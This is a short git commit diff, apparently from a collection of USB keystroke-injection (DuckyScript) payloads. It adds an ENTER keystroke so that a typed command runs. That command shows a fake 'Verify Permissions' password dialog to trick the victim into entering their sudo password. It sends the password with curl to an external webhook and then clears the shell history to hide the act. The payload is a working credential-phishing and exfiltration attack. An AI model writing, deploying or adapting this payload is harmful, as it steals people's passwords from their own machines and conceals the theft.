[+] Added Enter

pull/258/head
aleff-github 2023-03-15 10:26:33 +01:00
parent fbd205c260
commit d795dc9364
1 changed files with 1 additions and 0 deletions

View File

@ -31,3 +31,4 @@ DELAY 500
REM All-in-one is important REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit; STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
ENTER